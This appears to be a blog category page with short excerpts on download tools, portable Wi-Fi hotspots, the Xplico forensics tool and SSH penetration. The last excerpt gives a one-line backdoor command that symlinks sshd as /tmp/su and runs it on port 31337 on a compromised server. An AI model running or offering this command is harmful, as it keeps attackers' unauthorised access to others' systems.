Category: Uncategorized

Recommended Windows Download Tools

EagleGet

EagleGet, known in Chinese as “猎鹰” (Falcon), is a rising free download tool from overseas. Unlike Thunder (Xunlei), EagleGet features a clean, uncluttered interface. EagleGet can fully utilize bandwidth to accelerate downloads in high-speed network environments, while maintaining excellent stability under low-speed conditions. EagleGet also …

How to Choose a Portable Wi-Fi Hotspot

What Is the Working Principle of a Portable WiFi Hotspot?
It uses a wired network or a wireless Internet chip (SIM card) provided by a mobile carrier, and creates a WiFi hotspot to share the network. Various network terminals can access the Internet by connecting to this WiFi signal.

What Is the Difference Between a Portable WiFi Hotspot and a Phone Hotspot?
Frequently using your phone as a hotspot can …

Open-Source Network Forensics Tool Xplico

Xplico鈥檚 goal is to extract internet traffic and capture the information contained within application data. For example, Xplico can extract email content (via POP, IMAP, SMTP protocols), all HTTP content, each VoIP access (SIP), FTP, TFTP, and more from pcap files, but Xplico is not a …

SSH Penetration Techniques

Some tricks to fool rookie admins. After gaining SHELL access, if the target firewall has no restrictions, execute on the compromised server: ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=31337; to spawn an SSH service on port 31337.